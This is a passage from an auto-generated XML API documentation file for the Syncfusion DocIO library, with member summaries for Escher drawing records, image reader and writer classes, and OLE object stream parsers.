            Summary description for _FBSE.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_btWin32">
            <summary>
            Required type on Win32
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_btMacOS">
            <summary>
            Required type on Mac
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_rgbUid">
            <summary>
            Identifier of blip
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_tag">
            <summary>
            currently unused
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_size">
            <summary>
            Blip size in stream
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_cRef">
            <summary>
            Reference count on the blip
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_foDelay">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_usage">
            <summary>
            How this blip is used (MSOBLIPUSAGE)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_cbName">
            <summary>
            length of the blip name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_unused2">
            <summary>
            for the future
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.m_unused3">
            <summary>
            for the future
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Win32">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.MacOS">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Uid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Tag">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Size">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Ref">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Delay">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Usage">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Name">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Unused2">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FBSE.Unused3">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE">
            <summary>
            Summary description for FOPTE.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.m_pid">
            <summary>
            Property ID
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.m_bid">
            <summary>
            value is a blip ID � only valid if fComplex is FALSE
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.m_complex">
            <summary>
            complex property, value is lenght
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.m_op">
            <summary>
            Value
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.m_name">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.#ctor">
            <summary>
            Member initializing constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.Pid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.IsBid">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.IsComplex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.Op">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FOPTE.NameBytes">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.FSP">
            <summary>
            Summary description for FSP.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FSP.m_spid">
            <summary>
            shape ID
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.FSP.m_grfPersistent">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FSP.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FSP.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.FSP.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.Spid">
            <summary>
            Shape ID
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.GzfPersistent">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsGroup">
            <summary>
            This shape is a group shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.ISChild">
            <summary>
            Not a top-level shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsPatriarch">
            <summary>
            This is the topmost group shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsDeleted">
            <summary>
            The shape has been deleted
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsOleShape">
            <summary>
             The shape is an OLE object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsHaveMaster">
            <summary>
            Shape has a hspMaster property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsFliph">
            <summary>
            Shape is flipped horizontally
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsFlipv">
            <summary>
            Shape is flipped vertically
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsConnector">
            <summary>
            Connector type of shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsHaveAnchor">
            <summary>
            Shape has an anchor of some kind
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsBackground">
            <summary>
            Background shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.FSP.IsHavespt">
            <summary>
            Shape has a shape type property
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter">
            <summary>
            Summary description for ImageWriter
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.m_dataStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.m_picData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.m_srcMetafile">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.#ctor(System.IO.MemoryStream)">
            <summary>
            
            </summary>
            <param name="dataStream"></param>
            <param name="memConverter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.WriteImage(Syncfusion.DocIO.DLS.WPicture,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="pict"></param>
            <param name="height"></param>
            <param name="width"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.SetPictureSize(System.Single,System.Single,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Sets the picture size 
            </summary>
            <param name="height"></param>
            <param name="width"></param>
            <param name="pict"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.WriteInlineShapeObject(Syncfusion.DocIO.DLS.InlineShapeObject)">
            <summary>
            
            </summary>
            <param name="shapeObj"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.WriteInlineTxBxPicture(Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            
            </summary>
            <param name="txbxProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.SavePicf">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.DataStream">
            <summary>
            Get imagewriter's data stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageWriter.PictureData">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader">
            <summary>
            Summary description for ImageReader.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordImageReader">
            <summary>
            Interface for reading images from word file.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordImageReader.Image">
            <summary>
            Gets image as bitmap.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordImageReader.WidthScale">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordImageReader.HeightScale">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordImageReader.Width">
            <summary>
            Gets image width.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordImageReader.Height">
            <summary>
            Gets image height
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_dataStream">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_strImageName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_iStartImage">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_picData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_bitmap">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_spContainer">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_altText">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_unparsedData">
            <summary>
            Unparsed data;
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.m_dataStreamPosiotion">
            <summary>
            Data stream position
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.#ctor(System.IO.MemoryStream,System.Int32,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initialize class members and parse image from stream
            </summary>
            <param name="dataStream"></param>
            <param name="offset"></param>
            <param name="memConverter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.UpdateUnParsedData">
            <summary>
            Update un parsed data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.ImageName">
            <summary>
            Gets image name
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.Width">
            <summary>
            Gets/sets image width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.Height">
            <summary>
            Gets/sets image height
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.Image">
            <summary>
            Gets bitmap
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.WidthScale">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.HeightScale">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.InlineShapeContainer">
            <summary>
            Gets inline shape's container.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.PictureDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.ImageRecord">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.AlternativeText">
            <summary>
            Gets the alternative text.
            </summary>
            <value>The alternative text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.Name">
            <summary>
            Gets or sets the name.
            </summary>
            <value>
            The name.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.WordImageReader.UnparsedData">
            <summary>
            Get unparsed data
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip">
            <summary>
            Summary description for MetafileBlip.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_rgbUid">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_rgbUidPrimary">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_cbSave">
            <summary>
            Cache of saved size (size of m_pvBits)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_fCompression">
            <summary>
            MSOBLIPCOMPRESSION
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_pvBits">
            <summary>
            Compressed bits of metafile
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_length">
            <summary>
            Size of metafile in EMUs
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_rectLeft">
            <summary>
            Boundary of metafile drawing commands
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.m_fFilter">
            <summary>
            always msofilterNone
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.Read(System.IO.Stream,System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="length"></param>
            <param name="hasPrimaryUid"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.Write(System.IO.Stream,System.IO.MemoryStream,Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType,System.Byte[])">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="image"></param>
            <param name="imageFormat"></param>
            <param name="Uid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.WriteDefaults(System.IO.Stream,System.Int64,System.Byte[])">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="size"></param>
            <param name="Uid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.MetafileBlip.Metafile">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH">
            <summary>
            Summary description for MSOFBH.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.m_ver">
            <summary>
            Version
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.m_inst">
            <summary>
            Record instance
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.m_fbt">
            <summary>
            Record type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.m_cbLength">
            <summary>
            Length of record
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.#ctor">
            <summary>
            Defoult .ctor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.Read(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.Write(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.Version">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.Inst">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.Msofbt">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBH.Length">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_streamLength">
            <summary>
            Length of compObject stream
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_header">
            <summary>
            This MUST be a CompObjHeader structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_ansiUserTypeData">
            <summary>
            This MUST be a LengthPrefixedAnsiString structure that contains a display
            name of the linked object or embedded object
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_ansiClipboardFormatData">
            <summary>
            This MUST be a ClipboardFormatOrAnsiString structure that contains the
            Clipboard Format of the linked object or embedded object. If the MarkerOrLength
            field of the ClipboardFormatOrAnsiString structure contains a value other than
            0x00000000, 0xffffffff, or 0xfffffffe, the value MUST NOT be greater than 0x00000190.
            Otherwise the CompObjStream structure is invalid
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_reserved1Data">
            <summary>
            If present, this MUST be a LengthPrefixedAnsiString structure. If the Length field of
            the LengthPrefixedAnsiString contains a value of 0 or a value that is greater than
            0x00000028, the remaining fields of the structure starting with the String field
            of the LengthPrefixedAnsiString MUST be ignored on processing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_unicodeMarker">
            <summary>
            If this field is present and is NOT set to 0x71B239F4,
            the remaining fields of the structure MUST be ignored on processing
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_unicodeUserTypeData">
            <summary>
            This MUST be a LengthPrefixedUnicodeString structure that contains a display name
            of the linked object or embedded object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_unicodeClipboardFormatData">
            <summary>
            This MUST be a ClipboardFormatOrUnicodeString structure that contains a Clipboard
            Format of the linked object or embedded object. If the MarkerOrLength field of the
            ClipboardFormatOrUnicodeString structure contains a value other than 0x00000000,
            0xffffffff, or 0xfffffffe, the value MUST NOT be more than 0x00000190. Otherwise,
            the CompObjStream structure is invalid
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.m_reserved2Data">
            <summary>
            This MUST be a LengthPrefixedUnicodeString. The String field of the LengthPrefixedUnicodeString
            can contain any arbitrary value and MUST be ignored on processing.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.#ctor(Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Initializes a default instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.SaveTo(System.IO.Stream)">
            <summary>
            Saves data to STG stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.WriteZeroByteArr(System.IO.Stream,System.Int32)">
            <summary>
            Writes the zero byte array.
            </summary>
            <param name="stream">The stream.</param>
            <param name="byteLength">Length of the byte.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.WriteLengthPrefixedString(System.IO.Stream,System.String)">
            <summary>
            Writes the length prefixed string.
            </summary>
            <param name="stream">The stream.</param>
            <param name="data">The data.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.ObjectType">
            <summary>
            Gets the type of the object.
            </summary>
            <value>The type of the object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.ObjectTypeReserved">
            <summary>
            Gets the type of the object.
            </summary>
            <value>The type of the object.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.m_reserved1">
            <summary>
            This can be set to any arbitrary value and MUST be ignored on processing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.m_version">
            <summary>
            This can be set to any arbitrary value and MUST be ignored on processing.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.m_reserved2">
            <summary>
            This can be set to any arbitrary value and MUST be ignored on processing.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.SaveTo(System.IO.Stream)">
            <summary>
            Saves to STG stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.CompObjectStream.CompObjHeader.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.DEF_STRUCT_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.DEF_UNICODE_MARKER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.DEF_UNICODE_MARKER_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.m_filePathDataASCII">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.m_filePathDataUNICOD">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.m_filePath">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.#ctor(System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream"/> class.
            </summary>
            <param name="filePath">The file path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
            <returns>Length</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.SaveTo(System.IO.Stream)">
            <summary>
            Saves the data to stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.LinkInfoStream.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>The length.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.DEF_STRUCT_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.m_dataBytes">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.#ctor(System.IO.Stream)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream"/> class.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.#ctor">
            <summary>
            Initializes a default instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.ObjectInfoStream.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
